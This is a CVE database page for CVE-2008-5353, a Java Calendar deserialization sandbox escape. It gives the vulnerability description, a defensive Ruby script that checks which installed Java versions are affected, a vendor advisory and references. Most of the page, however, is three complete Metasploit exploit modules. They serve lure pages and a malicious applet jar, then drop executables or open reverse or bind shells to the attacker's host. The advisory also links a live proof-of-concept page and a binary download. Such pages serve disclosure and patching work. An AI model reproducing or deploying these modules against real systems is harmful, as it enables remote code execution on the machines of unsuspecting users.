CVE-2008-5353 : Detail

CVE-2008-5353

97.04%V3
Network
2008-12-05
10h00 +00:00
2018-10-11
17h57 +00:00

CVE Descriptions

The Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier does not properly enforce context of ZoneInfo objects during deserialization, which allows remote attackers to run untrusted applets and applications in a privileged context, as demonstrated by "deserializing Calendar objects".
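The affected ranges in this description can be checked against java -version banners collected from hosts. The Ruby code below is an added example, not part of the CVE record or of any vendor tooling; the host names and banners are constructed, and it covers only the Sun release families named on this page, so Apple's JVMs discussed in the advisory further down need separate handling.

```ruby
# Added example: classify legacy Sun Java version strings against the
# affected ranges quoted in the CVE-2008-5353 description on this page.

# Highest affected update number per release family (from the description).
AFFECTED_MAX_UPDATE = {
  [1, 6, 0] => 10, # JDK and JRE 6 Update 10 and earlier
  [1, 5, 0] => 16, # JDK and JRE 5.0 Update 16 and earlier
  [1, 4, 2] => 18  # SDK and JRE 1.4.2_18 and earlier
}.freeze

# Families the page explicitly states are not affected.
NOT_AFFECTED_FAMILIES = [[1, 3, 1]].freeze

# Legacy scheme: major.minor.micro, optional _update, optional -build suffix,
# e.g. "1.6.0_10", "1.5.0_16-b02", "1.4.2".
LEGACY_VERSION = /\A(\d+)\.(\d+)\.(\d+)(?:_(\d+))?(?:-[\w.]+)?\z/

def parse_legacy_version(text)
  m = LEGACY_VERSION.match(text.to_s.strip)
  return nil unless m

  { family: [m[1].to_i, m[2].to_i, m[3].to_i], update: (m[4] || '0').to_i }
end

# Pull the quoted version out of the first line that `java -version` prints,
# for example: java version "1.6.0_10"
def version_from_banner(banner)
  m = /version "([^"]+)"/.match(banner.to_s)
  m && m[1]
end

# Returns :affected, :not_affected, :not_listed (family not named on the
# page) or :unparsed (string does not follow the legacy scheme).
def cve_2008_5353_status(version)
  v = parse_legacy_version(version)
  return :unparsed unless v
  return :not_affected if NOT_AFFECTED_FAMILIES.include?(v[:family])

  max = AFFECTED_MAX_UPDATE[v[:family]]
  return :not_listed if max.nil?

  v[:update] <= max ? :affected : :not_affected
end

# Map an inventory of host => banner to host => status.
def audit(inventory)
  inventory.each_with_object({}) do |(host, banner), out|
    out[host] = cve_2008_5353_status(version_from_banner(banner))
  end
end

# Constructed sample inventory (hypothetical host names and banners).
SAMPLE_INVENTORY = {
  'build-01'   => 'java version "1.6.0_10"',
  'build-02'   => 'java version "1.6.0_11"',
  'legacy-app' => 'java version "1.5.0_09"',
  'erp-db'     => 'java version "1.4.2_19"',
  'kiosk'      => 'java version "1.3.1_20"',
  'ci-runner'  => 'openjdk version "17.0.2" 2022-01-18',
  'unknown'    => 'sh: java: command not found'
}.freeze

if __FILE__ == $PROGRAM_NAME
  audit(SAMPLE_INVENTORY).each do |host, status|
    puts format('%-11s %s', host, status)
  end
end
```

Hosts reported as :not_listed or :unparsed still need a manual look, since the page gives no range for them.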

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 10 | | AV:N/AC:L/Au:N/C:C/I:C/A:C | [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 16302

Publication date : 2011-01-07 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: java_signed_applet.rb 11516 2011-01-08 01:13:26Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Java
  include Msf::Exploit::EXE

  def initialize( info = {} )
    super( update_info( info,
      'Name' => 'Signed Applet Social Engineering Code Exec',
      'Description' => %q{
        This exploit dynamically creates an applet via the Msf::Exploit::Java mixin,
        converts it to a .jar file, then signs the .jar with a dynamically created
        certificate containing values of your choosing. This is presented to the end
        user via a web page with an applet tag, loading the signed applet.

        The user's JVM pops a dialog asking if they trust the signed applet and displays
        the values chosen. Once the user clicks 'accept', the applet executes with full
        user permissions.

        The java payload used in this exploit is derived from Stephen Fewer's and HDM's
        payload created for the CVE-2008-5353 java deserialization exploit.

        This module requires the rjb rubygem, the JDK, and the $JAVA_HOME variable to be
        set. If these dependencies are not present, the exploit falls back to a static,
        signed JAR.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'natron' ],
      'Version' => '$Revision: 11516 $',
      'References' =>
        [
          [ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ]
        ],
      'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
      'Payload' => { 'BadChars' => '', 'DisableNops' => true },
      'Targets' =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X PPC (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ]
        ],
      'DefaultTarget' => 1
    ))

    register_options(
      [
        OptString.new( 'CERTCN', [ true, "The CN= value for the certificate.", "Metasploit Inc." ]),
        OptString.new( 'APPLETNAME', [ true, "The main applet's class name.", "SiteLoader" ]),
        #OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]),

        # Not implemented yet.
        #OptString.new('PACKAGENAME', [ true, "The package name for gen'd classes.","x" ]),
        # Needs Rex::Zip to be able to crack zip files
        #OptString.new('CUSTOMJAR', [ false, "A custom .jar applet to use.", nil]),
      ], self.class)

    # No source right now, so don't give an option to save it
    #register_advanced_options(
    #  [
    #    OptString.new('SaveToFile', [ false, "When set, source is saved to this directory under external/source/", nil ])
    #  ], self.class)
  end

  def exploit
    #
    # Currently doing all processing in on_request_uri.
    # If this is too slow, we can move applet generation up here.
    #

    @use_static = false
    if not @jvm_init
      print_error
      print_error "The JDK failed to initialized: #{@java_error}"
      print_error "In order to dynamically sign the applet, you must install the Java Development Kit, the rjb gem, and set the JAVA_HOME environment variable."
      print_error
      print_error "Falling back to static signed applet. This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored."
      print_error
      @use_static = true
    else
      cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java")
      compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ])
      applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class")
      @compiled_applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) }
    end

    super
  end

  def on_request_uri( cli, request )
    payload = regenerate_payload(cli)
    if not payload
      print_error( "Failed to generate the payload." )
      # Send them a 404 so the browser doesn't hang waiting for data
      # that will never come.
      send_not_found(cli)
      return
    end

    if not request.uri.match(/\.jar$/i)
      if not request.uri.match(/\/$/)
        send_redirect( cli, get_resource() + '/', '')
        return
      end

      print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." )

      send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
      return
    end

    # If we haven't returned yet, then this is a request for our applet
    # jar, build one for this victim.
    jar = payload.encoded_jar

    if @use_static
      # Then build from the statically signed class files. Note that
      # this uses a pre-compiled version of Payload.class, so any new
      # updates to that file in the normal javapayload will not be
      # reflected here!
      applet_file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", "SiteLoader.class")
      applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) }
      jar.add_file("SiteLoader.class", applet_data)
      print_status("Building statically signed jar for #{cli.peerhost}")
      build_static_sig(jar)
      data = jar.to_s
    else
      # Then build from the class file we compiled in the exploit()
      # method above.
      jar.add_file("#{datastore["APPLETNAME"]}.class", @compiled_applet_data)
      print_status("Signing file for #{cli.peerhost}")
      # The RJB signing class requires the jar to be an actual file on
      # the filesystem, write it out.
      File.open(File.join(datastore["JavaCache"], "tmp.jar"), 'wb') { |f| f.write(jar.to_s) }
      sign_jar(datastore["CERTCN"], "tmp.jar", "signed.jar")
      # ... and read in the resulting signed jar
      data = File.open(File.join(datastore["JavaCache"], "signed.jar"), "rb") { |f| f.read(f.stat.size) }
    end

    print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." )
    send_response( cli, data.to_s, { 'Content-Type' => "application/octet-stream" } )

    handler( cli )
  end

  def generate_html
    html = %Q|<html><head><title>Loading, Please Wait...</title></head> |
    html += %Q|<body><center><p>Loading, Please Wait...</p></center> |
    html += %Q|<applet archive="#{datastore["APPLETNAME"]}.jar"\n|
    if @use_static
      html += %Q| code="SiteLoader" width="1" height="1">\n|
    else
      html += %Q| code="#{datastore["APPLETNAME"]}" width="1" height="1">\n|
    end
    html += %Q|</applet></body></html>|
    return html
  end

  def build_static_sig(jar)
    files = [
      "metasploit/Payload.class",
      "SiteLoader.class",
      "META-INF/MANIFEST.MF",
      "META-INF/SIGNFILE.RSA",
      "META-INF/SIGNFILE.SF",
    ]
    # Ghetto. Replace existing files in the Jar, then add in
    # anything that wasn't replaced. The reason for replacing the
    # .class files is to ensure that we're sending the
    # Payload.class as was signed rather than a newer one that was
    # updated without updating the signature. We'll just have to
    # cross our fingers and hope that any updates don't break
    # backwards compatibility in the handler until we can get
    # signing to work from ruby. Once we can sign jars directly
    # from ruby using OpenSSL, this won't be a problem.
    replaced = []
    # Replace the ones that are already there.
    jar.entries.map do |e|
      file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e.name)
      if File.file? file
        File.open(file, "rb") do |f|
          e.data = f.read(f.stat.size)
        end
      end
      replaced << e.name
    end
    # Add the rest
    files.each { |e|
      next if replaced.include? e
      file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e)
      File.open(file, "rb") do |f|
        jar.add_file(e, f.read(f.stat.size))
      end
    }
    jar
  end

  def applet_code
    applet = <<-EOS
import java.applet.*;
import metasploit.*;

public class #{datastore["APPLETNAME"]} extends Applet {
  public void init() {
    try {
      Payload.main(null);
    } catch (Exception ex) {
      //ex.printStackTrace();
    }
  }
}
EOS
  end
end

Exploit Database EDB-ID : 16293

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: java_calendar_deserialize.rb 10389 2010-09-20 04:38:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name' => 'Sun Java Calendar Deserialization Exploit',
      'Description' => %q{
        This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.

        The payload can be either a native payload which is generated as an executable and
        dropped/executed on the target or a shell from within the Java applet in the target browser.

        The affected Java versions are JDK and JRE 6 Update 10 and earlier,
        JDK and JRE 5.0 Update 16 and earlier,
        SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'sf', 'hdm' ],
      'Version' => '$Revision: 10389 $',
      'References' =>
        [
          [ 'CVE', '2008-5353' ],
          [ 'OSVDB', '50500'],
          [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ],
          [ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
          [ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ],
          [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ]
        ],
      'Platform' => [ 'win', 'osx', 'linux', 'solaris' ],
      'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets' =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X PPC (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Dec 03 2008'
    ))
  end

  def exploit
    # load the static jar file
    path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" )
    fd = File.open( path, "rb" )
    @jar_data = fd.read(fd.stat.size)
    fd.close

    super
  end

  def on_request_uri( cli, request )
    data = nil
    host = nil
    port = nil

    if not request.uri.match(/\.jar$/i)
      if not request.uri.match(/\/$/)
        send_redirect( cli, get_resource() + '/', '')
        return
      end

      print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." )

      payload = regenerate_payload( cli )
      if not payload
        print_error( "Failed to generate the payload." )
        return
      end

      if target.name == 'Generic (Java Payload)'
        if datastore['LHOST']
          jar = payload.encoded
          host = datastore['LHOST']
          port = datastore['LPORT']
          print_status( "Payload will be a Java reverse shell to #{host}:#{port} from #{cli.peerhost}..." )
        else
          port = datastore['LPORT']
          datastore['RHOST'] = cli.peerhost
          print_status( "Payload will be a Java bind shell on #{cli.peerhost}:#{port}..." )
        end
        if jar
          print_status( "Generated jar to drop (#{jar.length} bytes)." )
          jar = Rex::Text.to_hex( jar, prefix="" )
        else
          print_error( "Failed to generate the executable." )
          return
        end
      else
        # NOTE: The EXE mixin automagically handles detection of arch/platform
        data = generate_payload_exe

        if data
          print_status( "Generated executable to drop (#{data.length} bytes)." )
          data = Rex::Text.to_hex( data, prefix="" )
        else
          print_error( "Failed to generate the executable." )
          return
        end
      end

      send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )
      return
    end

    print_status( "#{self.name} sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." )
    send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )

    handler( cli )
  end

  def generate_html( data, jar, host, port )
    html = "<html><head><title>Loading, Please Wait...</title></head>"
    html += "<body><center><p>Loading, Please Wait...</p></center>"
    html += "<applet archive=\"Applet.jar\" code=\"msf.x.AppletX.class\" width=\"1\" height=\"1\">"
    html += "<param name=\"data\" value=\"#{data}\"/>" if data
    html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
    html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
    html += "<param name=\"lport\" value=\"#{port}\"/>" if port
    html += "</applet></body></html>"
    return html
  end

  def generate_jar()
    return @jar_data
  end
end

Exploit Database EDB-ID : 9948

Publication date : 2008-12-02 23h00 +00:00
Author : sf
EDB Verified : Yes

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize( info = {} )
    super( update_info( info,
      'Name' => 'Sun Java Calendar Deserialization Exploit',
      'Description' => %q{
        This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.

        The payload can be either a native payload which is generated as an executable and
        dropped/executed on the target or a shell from within the Java applet in the target browser.

        The effected Java versions are JDK and JRE 6 Update 10 and earlier,
        JDK and JRE 5.0 Update 16 and earlier,
        SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'sf', 'hdm' ],
      'Version' => '1',
      'References' =>
        [
          [ 'CVE', '2008-5353' ],
          [ 'OSVDB', '50500'],
          [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ],
          [ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
          [ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ],
          [ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ]
        ],
      'Platform' => [ 'win', 'osx', 'linux', 'solaris' ],
      'Payload' => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true },
      'Targets' =>
        [
          [ 'Generic (Java Payload)',
            {
              # This is a bad hack to force only the generic/shell_bind_tcp and generic/shell_reverse_tcp payloads
              'Platform' => ['win'],
              'Payload' => { 'Space' => 0 },
              'Arch' => ARCH_CMD,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X PPC (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget' => 0
    ))
  end

  def on_request_uri( cli, request )
    data = nil
    host = nil
    port = nil

    if not request.uri.match(/\.jar$/i)
      if not request.uri.match(/\/$/)
        send_redirect( cli, get_resource() + '/', '')
        return
      end

      print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." )

      payload = regenerate_payload( cli )
      if not payload
        print_status( "Failed to generate the payload." )
        return
      end

      if target.name == 'Generic (Java Payload)'
        if datastore['LHOST']
          host = datastore['LHOST']
          port = datastore['LPORT']
          print_status( "Payload will be a Java reverse shell to #{host}:#{port} from #{cli.peerhost}..." )
        else
          port = datastore['LPORT']
          datastore['RHOST'] = cli.peerhost
          print_status( "Payload will be a Java bind shell on #{cli.peerhost}:#{port}..." )
        end
      else
        if target['Arch'] == ARCH_X86
          data = Msf::Util::EXE.to_win32pe( framework, payload.encoded ) if target['Platform'] == 'win'
          data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
          data = Msf::Util::EXE.to_linux_x86_elf( framework, payload.encoded ) if target['Platform'] == 'linux'
        elsif target['Arch'] == ARCH_PPC
          data = Msf::Util::EXE.to_osx_ppc_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
        end

        if data
          print_status( "Generated executable to drop (#{data.length} bytes)." )
          data = Rex::Text.to_hex( data, prefix="" )
        else
          print_status( "Failed to generate the executable." )
          return
        end
      end

      send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } )
      return
    end

    print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." )
    send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )

    handler( cli )
  end

  def generate_html( data, host, port )
    html = "<html><head><title>Loading, Please Wait...</title></head>"
    html += "<body><center><p>Loading, Please Wait...</p></center>"
    html += "<applet archive=\"Applet.jar\" code=\"msf.x.AppletX.class\" width=\"1\" height=\"1\">"
    html += "<param name=\"data\" value=\"#{data}\"/>" if data
    html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
    html += "<param name=\"lport\" value=\"#{port}\"/>" if port
    html += "</applet></body></html>"
    return html
  end

  def generate_jar()
    path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5353.jar" )
    fd = File.open( path, "rb" )
    data = fd.read(fd.stat.size)
    fd.close
    return data
  end
end

Exploit Database EDB-ID : 8753

Publication date : 2009-05-19 22h00 +00:00
Author : Landon Fuller
EDB Verified : Yes

Critical Mac OS X Java Vulnerabilities

Introduction

Five months ago, CVE-2008-5353 and other vulnerabilities were publicly disclosed, and fixed by Sun.

CVE-2008-5353 allows malicious code to escape the Java sandbox and run arbitrary commands with the permissions of the executing user. This may result in untrusted Java applets executing arbitrary code merely by visiting a web page hosting the applet. The issue is trivially exploitable.

Unfortunately, these vulnerabilities remain in Apple's shipping JVMs, as well as Soylatte 1.0.3. As Soylatte does not provide browser plugins, the impact of the vulnerability is reduced. The recent release of OpenJDK6/Mac OS X is not affected by CVE-2008-5353.

Work-Arounds

* Mac OS X users should disable Java applets in their browsers and disable 'Open "safe" files after downloading' in Safari.
* Soylatte users running untrusted code should upgrade to an OpenJDK6-based release, where possible. No future releases of the JRL-based Soylatte branch are planned at this time. If this is an issue for you, please feel free to contact me.
* No work-around is available for users otherwise running Java untrusted code.

Proof of Concept

Unfortunately, it seems that many Mac OS X security issues are ignored if the severity of the issue is not adequately demonstrated. Due to the fact that an exploit for this issue is available in the wild, and the vulnerability has been public knowledge for six months, I have decided to release my own proof of concept to demonstrate the issue.

If you visit the following page, "/usr/bin/say" will be executed on your system by a Java applet, with your current user permissions. This link will execute code on your system with your current user permissions. The proof of concept runs on fully-patched PowerPC and Intel Mac OS X systems.

http://landonf.bikemonkey.org/static/moab-tests/CVE-2008-5353/hello.html

compiled/decompiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8753.tgz (2009-javax.tgz)

# milw0rm.com [2009-05-20]

Products Mentioned

Configuration 0

Sun>>Jdk >> Version To (including) 5.0
Sun>>Jdk >> Version To (including) 6
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 5.0
Sun>>Jdk >> Version 6
Sun>>Jdk >> Version 6
Sun>>Jdk >> Version 6
Sun>>Jdk >> Version 6
Sun>>Jdk >> Version 6
Sun>>Jdk >> Version 6
Sun>>Jdk >> Version 6
Sun>>Jdk >> Version 6
Sun>>Jdk >> Version 6
Sun>>Jdk >> Version 6
Sun>>Jre >> Version To (including) 1.4.2_18
Sun>>Jre >> Version To (including) 5.0
Sun>>Jre >> Version To (including) 6
Sun>>Jre >> Version 1.4.2_1
Sun>>Jre >> Version 1.4.2_2
Sun>>Jre >> Version 1.4.2_3
Sun>>Jre >> Version 1.4.2_4
Sun>>Jre >> Version 1.4.2_5
Sun>>Jre >> Version 1.4.2_6
Sun>>Jre >> Version 1.4.2_7
Sun>>Jre >> Version 1.4.2_8
Sun>>Jre >> Version 1.4.2_9
Sun>>Jre >> Version 1.4.2_10
Sun>>Jre >> Version 1.4.2_11
Sun>>Jre >> Version 1.4.2_12
Sun>>Jre >> Version 1.4.2_13
Sun>>Jre >> Version 1.4.2_14
Sun>>Jre >> Version 1.4.2_15
Sun>>Jre >> Version 1.4.2_16
Sun>>Jre >> Version 1.4.2_17
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 5.0
Sun>>Jre >> Version 6
Sun>>Jre >> Version 6
Sun>>Jre >> Version 6
Sun>>Jre >> Version 6
Sun>>Jre >> Version 6
Sun>>Jre >> Version 6
Sun>>Jre >> Version 6
Sun>>Jre >> Version 6
Sun>>Jre >> Version 6
Sun>>Jre >> Version 6
Sun>>Sdk >> Version To (including) 1.4.2_18
Sun>>Sdk >> Version 1.4.2_1
Sun>>Sdk >> Version 1.4.2_2
Sun>>Sdk >> Version 1.4.2_3
Sun>>Sdk >> Version 1.4.2_4
Sun>>Sdk >> Version 1.4.2_5
Sun>>Sdk >> Version 1.4.2_6
Sun>>Sdk >> Version 1.4.2_7
Sun>>Sdk >> Version 1.4.2_8
Sun>>Sdk >> Version 1.4.2_9
Sun>>Sdk >> Version 1.4.2_10
Sun>>Sdk >> Version 1.4.2_11
Sun>>Sdk >> Version 1.4.2_12
Sun>>Sdk >> Version 1.4.2_13
Sun>>Sdk >> Version 1.4.2_14
Sun>>Sdk >> Version 1.4.2_15
Sun>>Sdk >> Version 1.4.2_16
Sun>>Sdk >> Version 1.4.2_17

References

http://marc.info/?l=bugtraq&m=126583436323697&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/34259
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2009/0672
Tags : vdb-entry, x_refsource_VUPEN
http://rhn.redhat.com/errata/RHSA-2008-1018.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/33015
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34889
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34233
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1021313
Tags : vdb-entry, x_refsource_SECTRACK
http://security.gentoo.org/glsa/glsa-200911-02.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://marc.info/?l=bugtraq&m=123678756409861&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/38539
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34972
Tags : third-party-advisory, x_refsource_SECUNIA
https://rhn.redhat.com/errata/RHSA-2009-0466.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/35065
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/33528
Tags : third-party-advisory, x_refsource_SECUNIA
http://rhn.redhat.com/errata/RHSA-2008-1025.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2008/3339
Tags : vdb-entry, x_refsource_VUPEN
                                                                                                      http://www.redhat.com/support/errata/RHSA-2009-0445.html
                                                                                                      Tags : vendor-advisory, x_refsource_REDHAT
                                                                                                      http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1
                                                                                                      Tags : vendor-advisory, x_refsource_SUNALERT
                                                                                                      http://www.redhat.com/support/errata/RHSA-2009-0016.html
                                                                                                      Tags : vendor-advisory, x_refsource_REDHAT
                                                                                                      http://www.us-cert.gov/cas/techalerts/TA08-340A.html
                                                                                                      Tags : third-party-advisory, x_refsource_CERT
                                                                                                      http://secunia.com/advisories/33709
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://secunia.com/advisories/34605
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://www.redhat.com/support/errata/RHSA-2009-0015.html
                                                                                                      Tags : vendor-advisory, x_refsource_REDHAT
                                                                                                      http://secunia.com/advisories/35118
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://www.vupen.com/english/advisories/2009/1391
                                                                                                      Tags : vdb-entry, x_refsource_VUPEN
                                                                                                      http://secunia.com/advisories/32991
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://osvdb.org/50500
                                                                                                      Tags : vdb-entry, x_refsource_OSVDB
                                                                                                      http://www.securityfocus.com/bid/32608
                                                                                                      Tags : vdb-entry, x_refsource_BID
                                                                                                      http://secunia.com/advisories/37386
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                      http://secunia.com/advisories/33710
                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA